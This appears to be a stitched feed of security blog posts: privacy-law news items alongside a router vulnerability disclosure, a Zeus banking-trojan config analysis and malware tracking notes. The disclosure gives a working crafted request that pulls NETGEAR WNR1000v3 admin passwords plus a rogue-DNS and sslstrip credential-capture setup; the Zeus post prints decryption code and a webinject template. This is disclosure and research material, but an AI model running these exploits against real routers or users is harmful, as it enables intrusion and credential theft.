The High Court accepted that the claims being made amounted to the alleged tort of misuse of private information under English law and the alleged breach of the UK Data Protection Act 1998, and that in the three cases before the Court the issues were sufficiently serious to merit trial. The court held that the most appropriate forum would be an English court for the following reasons: (1) the focus of the case would be on the damage that the UK residents claim to have suffered, such that proceedings in the U.S. would be burdensome to them, and (2) the issues of English law raised by the case are complicated and would be costly and difficult to resolve in a U.S. court.

Criminal Background Checks: Reviewing the Year in FCRA Class Action Settlements

As reported in the Hunton Employment & Labor Perspectives Blog:

While much attention has been paid this year to the Equal Employment Opportunity Commission’s (“EEOC’s”) agenda and litigation over criminal background checks (the agency asserts such background checks have a disparate impact on minority groups), a parallel challenge kept pace in the form of private class action litigation under the Fair Credit Reporting Act (“FCRA”). 2013 saw a number of significant class action settlements against both employers and consumer reporting agencies (“CRAs”) for alleged violations of the FCRA in the use of criminal background checks:

  • Pitt v. K-Mart Corp., Case No. 11-cv-00697 (E.D. Va.): plaintiff’s October 2011 class action complaint alleged that K-Mart willfully violated the FCRA prior to obtaining consumer reports and prior to taking adverse actions against the class. In January 2013, parties reached a $3 million settlement, which received final approval from the court on May 24, 2013.
  • Singleton v. Domino’s Pizza LLC, 8:11-cv-01823-DKC, — F. Supp. 2d — (D. Md. Oct. 2, 2013): in this class action complaint, filed in July 2011, plaintiffs alleged that the consent form Domino’s used for procuring a consumer report violated the FCRA and that Domino’s took adverse actions against applicants without providing the required notices prior to the adverse action being taken. The matter settled in March 2013, and was subsequently approved in October 2013. Under the terms of the settlement, Domino’s agreed to pay to $2.5 million to a settlement fund, from which plaintiffs’ counsel’s 25% fee award would be taken.
  • Bell v. U.S. Xpress, Inc., 1:11-cv-00181-CLC-WBC (E.D. Tenn.): plaintiff alleged that, after applying with U.S. Xpress, defendant did not ask him if the company could obtain a consumer report as part of the application process, that defendant’s decision not to hire plaintiff was based, in part, on erroneous information in the report, and that plaintiff did not receive notice until after the decision was made, all in violation of the FCRA. In April 2013, defendant settled the class action lawsuit for $2.75 million.
  • Johnson v. Midwest Logistics Systems, Ltd., Case No. 2:11-cv-01061-ALM-TPK (S.D. Ohio): plaintiff in this purported class action alleged that he was hired by defendant, pending a successful criminal background check, but that he did not receive a stand-alone consent form, as required under the FCRA, that his consumer report was inaccurate, and he was denied the position without the proper notices. The case settled in May 2013, and Midwest agreed to pay $452,380.00.
  • Roe v. Intellicorp Records, Inc., Civ. No. 1:12CV2288-JG (N.D. Ohio): in this consolidated class action, plaintiffs accused two CRAs of providing inaccurate criminal background reports to employers that caused the class of applicants to suffer adverse actions, and of not notifying them at the time defendants provided the consumer reports to prospective employers. The case settled on November 12, 2013, when defendants agreed to pay $18.6 million to settle the FCRA claims.

2013 also has seen a number of new FCRA class action lawsuits, including a high-profile lawsuit filed against the Walt Disney Company, as well as class actions against two different national transportation and trucking companies, a national home improvement retailer, a broadcast company, and several large CRAs. It seems clear that the trends in FCRA litigation will continue. Thus, while employers may be focused on potential disparate impact claims based on the use of criminal background checks, they also should evaluate exposure to the companion risk that comes with criminal background check practices – class action claims under the Fair Credit Reporting Act.

Senators Renew Efforts to Pass Data Privacy Legislation

On January 8, 2014, Senator Patrick Leahy (D-VT), Chair of the U.S. Senate Judiciary Committee, reintroduced the Personal Data Privacy and Security Act of 2014, comprehensive information security legislation that would establish a national standard for data breach notification and require businesses to safeguard customers’ sensitive personal information from cyber threats. The bill also would establish criminal penalties for individuals who intentionally or willfully conceal a security breach involving personal data when the incident causes economic damage to consumers.

Senator Leahy first introduced the Personal Data Privacy and Security Act in 2005, and he has reintroduced the legislation in each of the previous four Congresses. Key provisions in the bill include:

  • criminal penalties for individuals who intentionally or willfully conceal a security breach involving personal data when the breach causes economic damage to consumers;
  • a requirement for companies that maintain personal data to establish and implement internal policies to protect data privacy and security; and
  • an update to the Computer Fraud and Abuse Act to make attempted computer hacking and conspiracy to commit computer hacking punishable under the same criminal penalties as the underlying offense.

The bill also authorizes the Federal Trade Commission to write and enforce rules requiring companies to protect “personally identifiable information” and to notify consumers in the event of a breach. Violators could face up to $500,000 in civil penalties. The FTC currently lacks explicit congressional authority in this area; data security cases are pursued under Section 5 of the FTC Act, which prohibits “unfair and deceptive” trade practices.

Senator Leahy announced that the issue of data privacy would be the subject of a Judiciary Committee hearing early in the new Senate session. Senator Deb Fischer (R-NE) also called for Congressional action on data security, urging the Senate Committee on Commerce, Science, and Transportation, on which she sits, to take up the issue.

Interview with Ian Iamit, SANS SIFT with Rob Lee – Episode 357, Part 1 – January 9, 2014

Ian Iamit is currently serving as a Director of Services at the leading boutique security consulting company IOActive, where he leads the services practice in the EMEA region. He is one of the founders of the Penetration Testing Execution Standard (PTES), its counterpart – the SexyDefense initiative, and a core member of the DirtySecurity crew.

Rob Lee is an entrepreneur and consultant in the Washington, DC area, specializing in information security, incident response, and digital forensics. Rob is currently the curriculum lead and author for digital forensic and incident response training at the SANS Institute in addition to owning his own firm.

MIT(R)M Attacks – Your middle or mine?

Introduction

Recently (actually months ago now) my wife went out to see some friends from Church which left me with a couple of hours to kill at home (after I put the kids bed of course). I decided to use this opportunity to look for security vulnerabilities in the wireless router provided by my ISP.

I installed the latest firmware update on the device and soon discovered a serious vulnerability in the router's password recovery feature (when exploited this vulnerability will display the admin credentials of the router in cleartext).

Note: At this point some of you might be thinking....siiiiiigghhhhhhh...."so a consumer grade wireless router has a security vulnerability...what's new...most home users don't bother changing the default username and password anyway"...right...but stay with me it gets better.

I didn't have much time to contact the vendor directly, so I decided to write up a description and send it off to Secunia. After several days I received back the following response:

We have received your report regarding <censored> wireless
router. But, unfortunately, we are not able to consider it as a SVCRP [1]
report as we do not have said device on our premise and subsequently cannot
confirm the vulnerability within our secure test environment.

Therefore, we will not process this report. In case you would like these
issues to be addressed by the vendor, we would like to encourage you to
report them to the vendor directly.

Thank you for reporting this to us though. We look forward to receive more
reports from you.


What!? Hmmmmm....you know they sell these at Walmart right? Well you can't really blame Secunia, what can you really do with admin access to a home wireless router anyway?  Well...let's take a look....

Before we delve into this further I should note that I attempted desperately to report the vulnerability to the vendor directly. This process was soooooo insanely difficult that it actually drove me to about 18 seconds of maniacal laughter. I seriously don't know if the internal communication was just horrible (I actually started getting emails back from the vendor addressing me as "Ms. Difrank"), or if they just DO NOT CARE!

There are actually many different attack vectors that can be leveraged once you compromise a home wireless router (or any router), but in the interest of brevity I just want to discuss one that hasn't been given enough attention (IMO).

Typically, Man-in-the-Middle (MITM) attacks are launched from "close" range against local networks. One has to ask the question though...where exactly is the "middle"? Without getting too philosophical, I'm going to suggest that the "middle" is relative...it can be any point between the source and the destination.

With that being said lets see how we can launch a Man-in-the-Relative-Middle attack against users connected to a home wireless router from anywhere in the "middle" (even over the Internet).

Note: This example focuses on intercepting HTTP/S traffic only.

Configure A Malicious DNS Server

First, I configure my laptop as a DNS server that will respond to all DNS requests with my laptop's IP address. There are many different ways/tools to do this, but for this demo I decided to use a simple BIND configuration that will respond to all DNS requests with my laptop IP.

Note: I don't recommend this technique in an actual Pentest, it's better to target specific domains (facebook, linkedin, google, etc.) 

1.) Add a new entry into your named.conf.local file for the "root" domain



2.) Setup a new zone file for the root domain (in this case "db.any") and copy it to the directory specified within your named.conf.options


After restarting the BIND service any DNS requests submitted to the server will return the IP address of the attacking system (in this case 192.168.1.10)


Note: I'm using an IP address on the local LAN, when launching this attack over the Internet you would configure this with your public IP.

Configure sslstrip

 Most sensitive information that traverses the web now days is encrypted using SSL/TLS. Rather than configuring an inline proxy server to intercept HTTP/S requests (which will work but generate certificate errors on the client) I've decided to use one of my favorite tools: "sslstrip".

Note: If you aren't familiar with sslstrip I encourage you to take a look here

Typically we would use sslstrip in addition to IP forwarding, ARP spoofing, and port redirection techniques on the local LAN (which is what it was designed for), but it also works pretty well just by kicking it off and sending web traffic directly to it.

Start sslstrip: 
sslstrip -l 80 -p -w sslposts.txt


This will configure sslstrip to listen on tcp port 80 and log all HTTP POSTs to the file sslposts.txt

Monitor HTTP POSTs:
tail -f sslposts.txt

Now that our server is configured, we simply modify the DNS settings on the WAN interface of our target router to point to our malicious server IP.

All HTTPS requested pages will be transparently replaced with HTTP pages (much more going on under the hood but I want to keep this short and sweet).



The login credentials can be seen in the HTTP POST log:



Ok...but how do we change the DNS settings in the router?

Most Home Internet routers are notorious for having security vulnerabilities. Let's take a look at the vulnerability I discovered and reported back in April 2013 (still vulnerable today).

The vulnerability I discovered affects NETGEAR N150 wireless routers identified as WNR1000v3. A flaw in the password recovery feature of this device allows an attacker to retrieve the router administrator username and password in cleartext.

Note:The router is vulnerable EVEN IF PASSWORD RECOVERY IS DISABLED!

I wrote a quick proof-of-concept script that extracts the username and password from a vulnerable router. I named the script "wnroast" since WNR sounds like "wiener"  to me   :)

wnroast.py <target ip> <target port>

Roasting the WNR:


Doing a Shodanhq search for WNR1000v3 reveals almost 14,000 hits! Imagine a scenario where an exploit for this vulnerability is scripted and hundreds of devices begin using malicious DNS servers, the impact would be severe.

Again MITRM represents only one of MANY attack vectors that may be taken once an attacker gains control of a home Internet router.

I should also mention that tools like sslstrip aren't really designed to work over the web so you will notice some pages don't load right or at all without additional customization.

There is certainly much more that could be said on this topic, but I'm out of time and I need to wrap this up.

In Closing:

The following are some recommendations to consider when securing administration access to your home Internet router.

  1. Disable remote administration access (over the web) or at least restrict it to trusted IPs only
  2. Whenever Possible - disable access to the administration page from the Wireless LAN (wired only)
That's all the time I've got time at this point, let's hope this gets patched soon!

Special thanks to wildB1ll for helping me test this out!


WNRoast Download:

wnroast.py can be downloaded here

Update (7-5-14): Metasploit aux mod available here

Full Disclosure Details:


The following is my original submission to Secunia and NETGEAR disclosing the details of the vulnerability:

Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless router are affected by a password recovery vulnerability. Exploiting this vulnerability allows an attacker to recover the router's (plaintext) Administrator credentials and subsequently gain full access to the device. This vulnerabilty can be exploited remotely if the remote administration access feature is enabled (as well as locally via wired or wireless access).
Tested Device Model: NETGEAR N150 WNR1000v3
Tested Device Firmware Versions: V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
Potential Impacts: Gaining full control over a wireless router exposes multiple attack vectors including: DoS, DNS control (many ways this can be leveraged to exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for guest and private network) firewall rule and port forwarding manipulation, etc.
Overview:
The password recovery mechanism appears to be designed to work as follows:
1.) After failing to login the user will be redirected to a password recovery page that requests the router serial number
2.) If the user enters the serial number correctly, another page will appear that requires the user to correctly answer 2 secret questions
3.) If the user answers the secret questions correctly, the router username and password is displayed
The problem: The implementation of this password recovery method has issues...lots of issues
Vulnerability and Exploit Details:
1.) Access the router login through a web browser: http://192.168.1.1
2.) Select "Cancel" on the HTTP basic login box (or enter arbitrary credentials), the router responds with the following (Note the "unauth.cgi?id" parameter):
----------------------------------------------------------------------------------------------

HTTP/1.0 401 Unauthorized

WWW-Authenticate: Basic realm="NETGEAR WNR1000v3"

Content-type: text/html
<html>

<head>

<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>

<title>401 Unauthorized</title></head>

<body onload="document.aForm.submit()"><h1>401 Unauthorized</h1>

<p>Access to this resource is denied, your client has not supplied the correct authentication.</p><form method="post" action="unauth.cgi?id=78185530" name="aForm"></form></body>

</html>
-------------------------------------------------------------------------------------------------
3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post request:
-------------------------------------------------------------------------------------------------
POST http://192.168.1.1/passwordrecovered.cgi?id=78185530 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 192.168.1.1
Content-Length: 35
Connection: Keep-Alive
Pragma: no-cache

-------------------------------------------------------------------------------------------------
The username and (plaintext) password are returned in the response (truncated for brevity):
-------------------------------------------------------------------------------------------------
...
<tr>
 <td class="MNUText" align="right">Router Admin Username</td>
 <td class="MNUText" align="left">admin</td>
 </tr>
 <tr>
 <td class="MNUText" align="right">Router Admin Password</td>
 <td class="MNUText" align="left">D0n'tGuessMe!</td>
 </tr>
...
-------------------------------------------------------------------------------------------------















Decoding Zeus 2.9.6.1 dynamic config

I got a look on the zeus builder who was released by the MMBB guy on exploit.in, finally i'm decided to write something about it, so let's talk about the change in the config encryption.
MD5: 0a05783316e7f765e731aadf5098564f

This version use AES instead of RC4 and can interact with the latest version of Firefox.
Anyway it's nothing more than a basic Zeus v2.

iBank parser on the panel, monitoring of process:
About the panel, the released version require Ioncube loader (nvm, the gate code can be recovered easily)

Now let's view an example of report from modules, keylog+screenshot:


Part of the static config (in plain on generated bot):

Installation process/dynamic config decoding (beware, dubstep):

And a small code because it's easier to understand:
<?php
    function decode($data, $key) {
        $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '');
        $iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
       
        mcrypt_generic_init($td, $key, $iv);
        mcrypt_generic($td, $data);
       
        $data = mdecrypt_generic($td, $data);
       
        mcrypt_generic_deinit($td);
        mcrypt_module_close($td);
       
        return $data;
    }
   
    function visualDecrypt(&$data) {
        $len = strlen($data);
       
        if ($len > 0)
            for ($i = $len - 1; $i > 0; $i--)
                $data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));
    }
   
    $data    = file_get_contents('config.bin');
    $key     = md5('hasd7h12g1', true);
    $decoded = decode($data, $key);
   
    visualDecrypt($decoded);
   
    $size = strlen($decoded);
   
    header('Content-Type: application/octet-stream;');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . $size);
    header('Content-Disposition: attachment; filename=config_decrypted.dll');
    header('Expires: 0');
    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');
   
    echo($decoded);
   
    exit;
?>

You can find the decoded modules here:
JAVA: 7d7ae6ffbd9f3c7673b339f9b94493e5
BSS: cc98dabebe047c6115a6cd9d13ed3122
KEYLOG: 8ac1c7c019d16ff3b8a9543d46ae5e0e

And if you want to test yourself the WebInject, i usually use this code:
set_url http://requesttests.appspot.com* GP
data_before
</body>
data_end

data_inject
<center><img src="http://temari.fr/webinject.png" alt="Injected!"></center>
data_end

data_after
data_end





/facepalm

FTC Approves COPPA Parental Consent Mechanism Proposal

On December 23, 2013, the Federal Trade Commission announced that it accepted a proposed mechanism, submitted by Imperium, LLC (“Imperium”), to obtain verifiable parental consent in accordance with the Children’s Online Privacy Protection Rule (the “COPPA Rule”) that came into effect July 1, 2013.

The COPPA Rule requires operators of certain websites and online services to obtain a parent’s consent before collecting personal information online from a child under the age of 13. In addition to the acceptable methods for obtaining the required parental consent listed in the COPPA Rule, the FTC’s recent revisions also allow entities to propose their own parental consent mechanisms for approval by the Commission. On September 9, 2013, the FTC announced that it had received a proposal from Imperium and invited public comment on the proposed mechanism.

In its letter to Imperium, the FTC stated that Imperium’s method of knowledge-based authentication (“KBA”) is an acceptable method of obtaining verifiable parental consent as it is “reasonably calculated. . . to ensure that the person providing consent is the child’s parent.” KBA allows an individual to demonstrate that he or she is the relevant child’s parent by answering a series of challenge questions. The FTC noted that, to obtain verifiable parental consent, the challenge questions must be (1) structured so the probability of correctly guessing the answers is low, and (2) sufficiently sophisticated so that a child age 12 or under “could not reasonably ascertain the answers.”

In approving Imperium’s proposed parental consent mechanism, the FTC noted that “financial institutions and credit bureaus . . . have used KBA to authenticate users for many years” and that the FTC and other government agencies, such as the Federal Financial Institutions Examination Council, have previously acknowledged the efficacy of KBA. In November 2013, the FTC rejected a proposed parental consent mechanism submitted by a different company stating that the company failed to provide sufficient “relevant research” and “marketplace evidence” that its proposed mechanism would ensure that the person providing consent is the child’s parent. Accordingly, it appears that future proposals are more likely to be approved if they employ a mechanism that has a history of success and acceptance by industry and government in other identity verification scenarios.

View the FTC’s letter to Imperium.

Troj/WowSpy-A

Recently a malware who target World of Warcraft got identified.
This threat is known as Disker, Mal/DllHook-A or Trojan.Siggen5.64266 and can steal player accounts even if they use a Battle.net Authenticator.
Yes, this is another post about password stealer mawlare...

 There is no option to retain password on the WoW client.

The method used to spread this malware is by fake websites leading to malicious download.
The Trojan is bundled with legit programs such as WowMatrix or Curse Client, used by players to manage their AddOns.



Malicious Wowmatrix installer. (DCDD6986941B2B4E78A558CAB3ACF337)

Fake sites:
• dns: 1 ›› ip: 142.4.105.98 - adress: WWW.CURSE.PW
• dns: 1 ›› ip: 142.4.105.98 - adress: WWW.WOWMATRIX.PW
• dns: 1 ›› ip: 142.4.105.99 - adress: WWW.WOWMATRIX.PW.PW


Blizzard released a statement due to this new threat:

I don't know how work the dll for the moment (at least a bit)
My debugger got some stability issue when handling wow.exe but i will get back on this, the mechanism seem interesting (and they even use OutputDebugString!).

Network trafic after login in:

C&C (in Chinese):

Compromised accounts:



That all for the moment :)

UK ICO to Investigate Only Serious or Repeat Violations

On December 18, 2013, the UK Information Commissioner’s Office (“ICO”) published its proposed strategy for handling complaints, stating that, beginning in April 2014, it will focus its efforts on the investigation of serious and repeat violations of data protection laws. The ICO also intends to publish regular reports highlighting the number of complaints it receives about organizations and enforcement actions it has taken. The ICO is seeking comments on the proposed strategy, which is explained in a public consultation document, before January 31, 2014.

Under the new approach, the ICO would not investigate every complaint it receives, instead taking a more selective approach to investigations and working to resolve disputes between organizations and individuals. The ICO noted that “[t]oo often we are drawn into adjudicating on individual disputes between organisations and their customers or clients, particularly where the legislation we oversee may only be a peripheral part of the matter being disputed. We want to focus on those who get things wrong repeatedly, and take action against those who commit serious contraventions of the legislation.”

The ICO makes clear in the consultation document that it does not intend to adopt a “one size fits all” approach to complaint resolution. The approach it takes in individual cases will depend on whether the ICO is able to “identify an opportunity to improve information rights practice,” which will vary on a case-by-case basis and may involve offering advice to both parties. For example, the ICO may ask the organization to take ownership of its customer’s concern, to improve its practices, or, in the most serious cases, to change its conduct or face an enforcement action. The ICO believes that this approach, coupled with its provision of tools and guidance, will enable individuals to receive a clear and open response to their concerns, encourage compliance, and ensure the ICO’s limited resources are targeted at companies that seriously or repeatedly fail to ensure good data protection.

The ICO has also committed to improving the way it captures and analyzes complaints in an effort to “quickly determine whether the concern is a one-off, or is evidence of a pattern of poor practice.” It also will publish regular reports listing the number of complaints it has received about organizations, the enforcement actions it has taken and noting improvements made to information rights practices in the sectors it regulates.

The ICO intends its new approach to take effect starting April 1, 2014. To submit a response to the consultation, visit the ICO’s consultation webpage and complete the consultation response document. The consultation is open to the public until January 31, 2014.

Privacy and Data Security: The Future of the U.S.-EU Safe Harbor

The EU-U.S. Safe Harbor Framework is an important cross-border data transfer mechanism that enables certified organizations to move personal data from the European Union to the United States in compliance with European data protection laws. Recently, however, the Safe Harbor’s future has been thrown into doubt. In an article published on October 30, 2013 by Practical Law, Lisa J. Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP, partner Bridget Treacy and associate Naomi McBride, examine the Safe Harbor Framework and its future viability in light of criticism from the European Commission and some EU data protection authorities, which intensified in the past year following disclosures regarding the U.S. government’s surveillance programs.

Download a PDF copy of the article.

UK ICO Publishes App Developer Guidance

In December 2013, the UK Information Commissioner’s Office (“ICO”) issued non-binding guidance aimed at app developers (the “Guidance”). The Guidance applies to all types of mobile devices, including smart TVs and video game consoles.

In the Guidance, the ICO emphasizes that the Data Protection Act 1998 (“DPA”) equally applies to mobile apps as it does to more traditional businesses. Further, the mobile environment presents particular privacy concerns due to the fact that:

  • mobile devices are portable and personal, used frequently, and are generally always on;
  • mobile devices typically include multiple data collection sensors (e.g., microphone, camera, GPS receiver); and
  • smaller screens make it more challenging to provide adequate notice to users.

Importance of Privacy by Design

The Guidance encourages app developers to consider privacy issues at the outset of the design phase and adopt a privacy by design approach. This underscores the importance for developers to understand how the personal data collected through the app will be used as well as who the data controller will be throughout the lifecycle of the app. Even where an app developer creates an app on behalf of a client, so that it will not act as the data controller, the Guidance encourages developers to consider privacy and security during the design and development process.

Providing Fair Notice

The Guidance provides practical tips on providing fair notice to users, in particular: (1) the importance of using plain English that is appropriate to the target audience; (2) clearly stating the purposes for which the personal data will be used; (3) providing notice as soon as practicable; and, (4) using layered notices if appropriate. The Guidance highlights the importance of drawing users’ attention to unusual or unexpected uses of their personal data, and recommends using “just-in-time” notices to do so.

Providing Meaningful Choices

The Guidance encourages developers to give users “granular” choices where possible, as opposed to “all or nothing” choices, as well as permitting users to later change their minds.

In addition to better legal compliance, the ICO highlights the potential commercial benefits of better privacy. “Users will have more confidence in apps that clearly respect their privacy. Users may uninstall or remove apps that contain surprises about how their personal data is used.”

HHS Announces Settlement with Dermatology Practice for Potential HIPAA Privacy, Security and Breach Notification Rule Violations

On December 26, 2013, the Department of Health and Human Services (“HHS”) announced a resolution agreement and $150,000 settlement with Adult & Pediatric Dermatology, P.C. (“APDerm”), a private dermatology practice based in Massachusetts, following a security breach that affected approximately 2,200 individuals. In connection with the announcement, the HHS Office for Civil Rights (“OCR”) Director Leon Rodriguez stated that “[c]overed entities of all sizes need to give priority to securing electronic protected health information.”

OCR initiated an investigation of APDerm following a report that an unencrypted flash drive was stolen from a vehicle owned by an APDerm staff member. The flash drive was not recovered and contained the electronic protected health information (“ePHI”) of approximately 2,200 patients of APDerm. After the investigation, OCR alleged that APDerm failed to (1) conduct a timely and thorough analysis of the risks to the confidentiality of its ePHI, (2) fully draft and implement written policies and procedures to train its workforce regarding breach notification requirements, and (3) reasonably safeguard the unencrypted flash drive that was stolen from a vehicle owned by an APDerm staff member.

Pursuant to the resolution agreement, APDerm has agreed to pay a $150,000 settlement to HHS. In addition, the Corrective Action Plan attached to the resolution agreement requires APDerm to:

  • conduct a comprehensive risk analysis of the security risks and vulnerabilities to the company’s ePHI;
  • develop a risk management plan based on the risk analysis, which must be approved by OCR;
  • report instances of noncompliance by its personnel with its privacy, security and breach notification policies and procedures to OCR;
  • submit an implementation report detailing how APDerm will comply with the resolution agreement and the Corrective Action Plan; and
  • retain documents related to compliance with the Corrective Action Plan for three years.

View the resolution agreement.

FTC Reaches Settlement with Accretive Health

On December 31, 2013, the Federal Trade Commission announced that Accretive Health, Inc. (“Accretive”) has agreed to settle charges that the company’s inadequate data security measures unfairly exposed sensitive consumer information to the risk of theft or misuse. Accretive experienced a breach in July 2011 that involved the protected health information of more than 23,000 patients.

The FTC alleged that Accretive failed to (1) provide reasonable and appropriate security measures to protect consumers’ personal information, (2) employ reasonable procedures designed to ensure that employees remove consumers’ personal information that they no longer needed from their computers, and (3) adequately restrict employee access to consumers’ personal information based on an employee’s need for the information. Under the terms of the settlement with the FTC, which will be in force for 20 years, Accretive must establish a comprehensive information security program that will be evaluated both initially and every two years by a certified, independent third party.

On July 31, 2012, Accretive settled a federal lawsuit with the Minnesota Attorney General for $2.5 million for violations of the Health Insurance Portability and Accountability Act of 1996 and various Minnesota debt collection and consumer protection laws relating to the same incident.

The settlement is open for public comment until January 30, 2014.

Update: On February 24, 2014, the FTC approved the final consent order with Accretive.

Jolly Roger Stealer

Friend Kafeine have already do a post on it, although someone recently sent me a url on my cybercrime tracker.. i give a f%$k
• dns: 1 ›› ip: 178.162.193.24 - adresse: LOADER.ISTMEIN.DE


Bot statistic:
CPU "Arhitecture"

Task:

Search module:

HTTP:

Mail:

Create task:

Task statistic:

I haven't looked at a sample because i don't have it but sound very lame, like Plasma HTTP who grab everything without checking if there is already a double.

German DPAs Publish Further Guidance on the Use of Personal Data for Advertising Purposes

On December 10, 2013, a German data protection working group on advertising and address trading published new guidelines on the collection, processing and use of personal data for advertising purposes (the “Guidelines”). The working group was established by the committee of German data protection authorities (“DPAs”) and is chaired by the Bavarian DPA. The first set of guidelines were published in November 2012.

These new Guidelines cover, among other things, the following:

  • the use of personal data for advertising purposes without the data subject’s consent (so-called “list-privilege”);
  • consent in the context of advertising, including form (written, electronic, double opt-in) and content requirements; and
  • the data subject’s rights with respect to advertising and the timeframes within which data controllers must respond to the exercise of such rights.

Both sets of guidelines represent a significant clarification of the data protection regulations that apply to advertising in Germany. They are relevant to all businesses with German advertising operations, regardless of target audience (business-to-business and business-to-consumer) or advertising channel (email, telephone, mail).